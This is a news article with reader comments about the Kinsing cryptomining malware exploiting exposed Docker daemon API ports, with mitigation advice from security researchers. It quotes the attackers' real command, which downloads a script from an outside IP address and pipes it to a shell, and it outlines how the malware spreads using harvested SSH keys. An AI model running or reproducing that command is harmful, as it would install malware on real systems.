News: 1586339112

  ARM Give a man a fire and he's warm for a day, but set fire to him and he's warm for the rest of his life (Terry Pratchett, Jingo)

If you don't cover your Docker daemon API port you'll have a hell of a time... because cryptocreeps are hunting for it

(2020/04/08)


Some Docker installations are getting hammered by malware skiddies hoping to mine digital cash using other people's CPU time.

Infosec outfit Aqua – no, not the Barbie Girl band – said miscreants have spotted that a decent number of Docker deployments are lazily or inadvertently exposing the daemon API port to the public internet with no protection. It's a [1]fairly common error that hackers have [2]exploited in the past to mine digital coins, although lately we're told there have been thousands of infection attempts daily via this interface, all involving a piece of Linux malware dubbed Kinsing.

"These are the highest numbers we’ve seen in some time, far exceeding what we have witnessed to date," [3]noted researcher Gal Singer this week.

"We therefore believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor."

If an open system is found, the attacker tells it to create and run a custom Ubuntu container that executes the following command: /bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O - 142.44.191.122/d.sh | sh;tail -f /dev/null

The fetched d.sh script disables SELINUX security protections, as well as searches out and removes any other malware or cryptomining containers already running on the infected machine. That way it won't have to compete for CPU time. It uses crontab to ensure it stays running every minute, and a bunch of other stuff: it's 600 lines long.

The script also downloads the Kinsing malware proper, and runs it. This software nasty tries to make contact with one of four command and control servers in Eastern Europe for any special orders to carry out on the infected system. It also runs a script, called spre.sh , that uses any SSH keys it finds to log into and spread to other machines to run its code.

"The spre.sh shell script that the malware downloads is used to laterally spread the malware across the container network," Aqua's Singer said.

"In order to discover potential targets and locate the information it needs to authenticate against, the script passively collects data from /.ssh/config, .bash_history, /.ssh/known_hosts, and the likes. We did not identify any active scanning techniques used to identify additional targets."

Once that is done, the mining component of the malware is finally executed.

[4]

A diagram of the attack process

click to enlarge

The Register has pinged Docker for comment on the attacks. In the meantime, Singer and Aqua recommend blocking the IP addresses linked to this outbreak. It's also highly recommended you don't leave the daemon API port facing the internet, and use policies and configurations to limit what systems are allowed to talk to the interface.

"Identify all cloud resources and group them by some logical structure," said the team. "Review authorization and authentication policies, basic security policies, and adjust them according to the principle of least privilege. Investigate logs, mostly around user actions, look for actions you can’t account for anomalies." ®

Sponsored: [5]How To Accelerate Brilliant Digital Experiences With Low-Code



[1] https://docs.docker.com/engine/security/security/#docker-daemon-attack-surface

[2] https://blog.trendmicro.com/trendlabs-security-intelligence/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims/

[3] https://blog.aquasec.com/threat-alert-kinsing-malware-container-vulnerability

[4] https://regmedia.co.uk/2020/04/06/aquakinsingdiagram.jpg

[5] https://go.theregister.co.uk/tl/1936/-8552/how-to-accelerate-brilliant-digital-experiences-with-low-code?td=wptl1936

Why is the d.sh provider still up?

Jonathan Richards 1

142.44.191.122 is in the range for a hosting provider in Canada. Why has it not been taken down if it's hosting something as clearly malicious as d.sh?

Re: Why is the d.sh provider still up?

bombastic bob

ack on that - I haven't tried wget'ting that file, but if I were them, I'd swap it for something that shuts DOWN the virus wherever the infection exists... ok maybe that is a *bit* too 'grey hat' but "I heard a rumor" that "someone did a shutdown script" like that for code-red infected machines {me whistles with innocent look} that basically detected where the penetration attempted to come from, and back-hacked them and turned of ISS [code red sat in memory, shutting down ISS would stop the infection temporarily].

Anyway...

I was just thinking about this, having had the need to have the network guy open up a non-obvious ssh port into a client's network so I could do things remotely. I was thinking of what security things I would need to add, users and passwords to modify and/or lock out from ssh logins, to an otherwiswe normal ssh daemon, how to do it without locking myself out by accident in the process, and things of THAT nature, then I saw this and "It figures, miscreants are out there TAKING ADVANTAGE of little or no on-site staff capable of mitigating such things".

my own system only allows specific users to log in from outside the network, which have cryptic user names and even MORE cryptic passwords. So I wanted to do something like THAT. But obviously I could lock myself out of logging in at ALL if I'm not uber careful.

and, of course, if I do NOT secure it more tightly, some miscreant out there is likely to POUND ON IT with one of those dictionary-based ssh attacks and maybe not get noticed for HOURS... because I had to open it up to an outside IP address as a result of of coronavirus responses by governments.

Pinged? Really?

Down not across

The Register has pinged Docker for comment on the attacks.

What is wrong with "contacted" or something along those lines. Guess it is just me, but the current fad of "pinging" really irks me.

Alright, I'll crawl back under my rock.

Oh....and get orf my lawn!

Re: Pinged? Really?

Anonymous Coward

Pong!

And he climbed with the lad up the Eiffelberg Tower. "This," cried the Mayor,
"is your town's darkest hour! The time for all Whos who have blood that is red
to come to the aid of their country!" he said. "We've GOT to make noises in
greater amounts! So, open your mouth, lad! For every voice counts!" Thus he
spoke as he climbed. When they got to the top, the lad cleared his throat and
he shouted out, "YOPP!"
And that Yopp... That one last small, extra Yopp put it over!
Finally, at last! From the speck on that clover their voices were heard!
They rang out clear and clean. And they elephant smiled. "Do you see what
I mean?" They've proved they ARE persons, no matter how small. And their
whole world was saved by the smallest of All!"
"How true! Yes, how true," said the big kangaroo. "And, from now
on, you know what I'm planning to do? From now on, I'm going to protect
them with you!" And the young kangaroo in her pouch said, "ME TOO! From
the sun in the summer. From rain when it's fall-ish, I'm going to protect
them. No matter how small-ish!"
-- Dr. Seuss "Horton Hears a Who"